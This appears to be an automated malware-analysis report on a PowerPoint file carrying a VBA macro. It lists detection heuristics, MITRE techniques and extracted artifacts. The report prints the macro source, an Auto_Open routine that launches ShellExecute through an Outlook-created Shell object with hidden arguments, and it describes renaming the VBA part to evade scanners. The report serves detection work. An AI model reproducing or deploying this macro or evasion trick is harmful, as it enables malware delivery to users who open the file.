MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is an OOXML document containing a VBA macro that is automatically executed via the Auto_Open subroutine. This macro uses CreateObject to instantiate Outlook and Shell objects, and then calls ShellExecute with concatenated strings derived from the 'hola' module. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The VBA project part was renamed to evade detection, and the Auto_Open macro combined with CreateObject calls are high-confidence indicators of malicious intent.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/kaskapsdlpalsd.b)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Outlook = CreateObject("Outlook.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Auto_Open _ -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.bitly.com/ashdiowkwoi In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 659 bytes |
SHA-256: e473bea3b6bd8691b50e402cfd6e66da2144afa1a38678454ea5036cd5f5fe7a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module111"
Sub _
Auto_Open _
()
Set Outlook = CreateObject("Outlook.Application")
Set Microsoft = Outlook.CreateObject("Shell.Application")
Microsoft.ShellExecute hola.gola.Accelerator + hola.gola.ControlTipText, hola.gola.Caption
End _
Sub
Attribute VB_Name = "hola"
Attribute VB_Base = "0{559D5D9D-8678-495C-8412-C0918EDE6429}{58FAF3E2-E78A-4EE3-A7F6-E552181D8221}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/kaskapsdlpalsd.b | 18432 bytes |
SHA-256: c838cf10ccb31da069e910b97887a8e64b6667f16ee35fc3b7a9dcf4d2330659 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.